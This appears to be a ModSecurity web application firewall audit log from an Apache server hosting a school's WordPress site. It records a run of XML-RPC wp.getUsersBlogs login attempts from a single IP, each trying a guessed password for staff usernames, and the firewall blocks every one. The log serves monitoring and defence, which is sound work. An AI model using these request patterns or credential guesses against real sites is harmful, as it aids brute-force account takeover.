Stopwatch2: 1745074457936825 5275; combined=4127, p1=500, p2=3438, p3=0, p4=0, p5=112, sr=91, sw=77, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0f21c630-Z--
--81324803-A--
[19/Apr/2025:21:55:17 +0700] aAO5VevDiFC_ir7MDwYdYAAAAEc 103.236.140.4 34106 103.236.140.4 8181
--81324803-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--81324803-C--
wp.getUsersBlogs
wakasarpras
!null!
--81324803-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--81324803-E--
--81324803-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (36+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745074517983489 6316 (- - -)
Stopwatch2: 1745074517983489 6316; combined=4926, p1=464, p2=4228, p3=0, p4=0, p5=139, sr=84, sw=95, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--81324803-Z--
--6c5db504-A--
[19/Apr/2025:21:56:17 +0700] aAO5kevDiFC_ir7MDwYeiQAAAE4 103.236.140.4 40352 103.236.140.4 8181
--6c5db504-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 226
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--6c5db504-C--
wp.getUsersBlogs
wakasarpras
t0rchw00d
--6c5db504-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6c5db504-E--
--6c5db504-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (39+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745074577938243 8092 (- - -)
Stopwatch2: 1745074577938243 8092; combined=4813, p1=893, p2=3776, p3=0, p4=0, p5=86, sr=92, sw=58, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6c5db504-Z--
--cc0af025-A--
[19/Apr/2025:21:57:17 +0700] aAO5zXNa4dA2HllpK_O0oAAAAJI 103.236.140.4 46494 103.236.140.4 8181
--cc0af025-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--cc0af025-C--
wp.getUsersBlogs
wakasarpras
coffee
--cc0af025-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--cc0af025-E--
--cc0af025-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745074637482050 5583 (- - -)
Stopwatch2: 1745074637482050 5583; combined=4096, p1=511, p2=3378, p3=0, p4=0, p5=126, sr=89, sw=81, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--cc0af025-Z--
--56d7ca14-A--
[19/Apr/2025:21:58:17 +0700] aAO6CUruoUXZj665VUE5nwAAANc 103.236.140.4 52778 103.236.140.4 8181
--56d7ca14-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--56d7ca14-C--
wp.getUsersBlogs
wakasarpras
qweewq
--56d7ca14-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--56d7ca14-E--
--56d7ca14-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745074697887395 5613 (- - -)
Stopwatch2: 1745074697887395 5613; combined=3891, p1=478, p2=3201, p3=0, p4=0, p5=131, sr=91, sw=81, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--56d7ca14-Z--
--9354a21a-A--
[19/Apr/2025:21:59:19 +0700] aAO6R-vDiFC_ir7MDwYi-AAAAEs 103.236.140.4 59042 103.236.140.4 8181
--9354a21a-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--9354a21a-C--
wp.getUsersBlogs
wakasarpras
zzzz
--9354a21a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9354a21a-E--
--9354a21a-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (39+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745074759157263 4951 (- - -)
Stopwatch2: 1745074759157263 4951; combined=3510, p1=430, p2=2913, p3=0, p4=0, p5=97, sr=82, sw=70, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9354a21a-Z--
--a9317d65-A--
[19/Apr/2025:22:00:19 +0700] aAO6gw6cTFSgLAHl7PoZYwAAABU 103.236.140.4 36912 103.236.140.4 8181
--a9317d65-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--a9317d65-C--
wp.getUsersBlogs
wakasarpras
qwe321
--a9317d65-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a9317d65-E--
--a9317d65-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745074819538175 5379 (- - -)
Stopwatch2: 1745074819538175 5379; combined=4033, p1=480, p2=3280, p3=0, p4=0, p5=156, sr=86, sw=117, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a9317d65-Z--
--d4227474-A--
[19/Apr/2025:22:00:41 +0700] aAO6mXNa4dA2HllpK_O5nwAAAJU 103.236.140.4 39200 103.236.140.4 8181
--d4227474-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--d4227474-C--
wp.getUsersBlogs
wakasarpras
1234%^&*
--d4227474-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d4227474-E--
--d4227474-H--
Message: XML parser error: XML: Failed parsing document.
Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745074841880902 5151 (- - -)
Stopwatch2: 1745074841880902 5151; combined=4051, p1=438, p2=3455, p3=0, p4=0, p5=96, sr=71, sw=62, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d4227474-Z--
--200f0055-A--
[19/Apr/2025:22:01:24 +0700] aAO6xOvDiFC_ir7MDwYlUwAAAFA 103.236.140.4 43348 103.236.140.4 8181
--200f0055-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--200f0055-C--
wp.getUsersBlogs
wakasarpras
qqii
--200f0055-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--200f0055-E--
--200f0055-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (38+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745074884853330 5399 (- - -)
Stopwatch2: 1745074884853330 5399; combined=3885, p1=455, p2=3260, p3=0, p4=0, p5=101, sr=88, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--200f0055-Z--
--29ced913-A--
[19/Apr/2025:22:02:28 +0700] aAO7BEruoUXZj665VUFA6wAAANc 103.236.140.4 49338 103.236.140.4 8181
--29ced913-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--29ced913-C--
wp.getUsersBlogs
wakasarpras
212903
--29ced913-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--29ced913-E--
--29ced913-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (38+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745074948641384 5538 (- - -)
Stopwatch2: 1745074948641384 5538; combined=3847, p1=478, p2=3186, p3=0, p4=0, p5=109, sr=91, sw=74, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--29ced913-Z--
--6bfff868-A--
[19/Apr/2025:22:03:29 +0700] aAO7QQ6cTFSgLAHl7Pod8gAAAAU 103.236.140.4 54968 103.236.140.4 8181
--6bfff868-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 222
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--6bfff868-C--
wp.getUsersBlogs
wakasarpras
maria
--6bfff868-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6bfff868-E--
--6bfff868-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (28+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745075009461839 5477 (- - -)
Stopwatch2: 1745075009461839 5477; combined=4026, p1=510, p2=3344, p3=0, p4=0, p5=101, sr=96, sw=71, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6bfff868-Z--
--c6b34b00-A--
[19/Apr/2025:22:04:32 +0700] aAO7gEruoUXZj665VUFEAgAAAMU 103.236.140.4 60570 103.236.140.4 8181
--c6b34b00-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--c6b34b00-C--
wp.getUsersBlogs
wakasarpras
diamond
--c6b34b00-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c6b34b00-E--
--c6b34b00-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (30+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745075072654731 5532 (- - -)
Stopwatch2: 1745075072654731 5532; combined=4044, p1=551, p2=3311, p3=0, p4=0, p5=107, sr=85, sw=75, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c6b34b00-Z--
--f9db2020-A--
[19/Apr/2025:22:05:32 +0700] aAO7vOvDiFC_ir7MDwYqwAAAAEQ 103.236.140.4 37736 103.236.140.4 8181
--f9db2020-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--f9db2020-C--
wp.getUsersBlogs
wakasarpras
loveyou
--f9db2020-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f9db2020-E--
--f9db2020-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (19+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745075132082503 5155 (- - -)
Stopwatch2: 1745075132082503 5155; combined=3502, p1=427, p2=2918, p3=0, p4=0, p5=94, sr=81, sw=63, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f9db2020-Z--
--e45a6718-A--
[19/Apr/2025:22:06:40 +0700] aAO8AEruoUXZj665VUFHHQAAANY 103.236.140.4 43946 103.236.140.4 8181
--e45a6718-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--e45a6718-C--
wp.getUsersBlogs
wakasarpras
123456b
--e45a6718-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e45a6718-E--
--e45a6718-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745075200140562 4546 (- - -)
Stopwatch2: 1745075200140562 4546; combined=3249, p1=397, p2=2696, p3=0, p4=0, p5=91, sr=76, sw=65, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e45a6718-Z--
--8e87cd60-A--
[19/Apr/2025:22:07:41 +0700] aAO8PXNa4dA2HllpK_PCLgAAAIE 103.236.140.4 49578 103.236.140.4 8181
--8e87cd60-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 233
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--8e87cd60-C--
wp.getUsersBlogs
kasubagtu
kasubagtukasubagtu
--8e87cd60-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8e87cd60-E--
--8e87cd60-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (26+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745075261267700 4807 (- - -)
Stopwatch2: 1745075261267700 4807; combined=3607, p1=448, p2=2930, p3=0, p4=0, p5=134, sr=85, sw=95, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8e87cd60-Z--
--38ce4545-A--
[19/Apr/2025:22:08:41 +0700] aAO8eQ6cTFSgLAHl7PolpwAAABM 103.236.140.4 55002 103.236.140.4 8181
--38ce4545-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--38ce4545-C--
wp.getUsersBlogs
kasubagtu
123123123
--38ce4545-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--38ce4545-E--
--38ce4545-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745075321534088 4147 (- - -)
Stopwatch2: 1745075321534088 4147; combined=3006, p1=375, p2=2484, p3=0, p4=0, p5=87, sr=72, sw=60, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--38ce4545-Z--
--6600626d-A--
[19/Apr/2025:22:09:51 +0700] aAO8v3Na4dA2HllpK_PE5gAAAI8 103.236.140.4 33654 103.236.140.4 8181
--6600626d-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
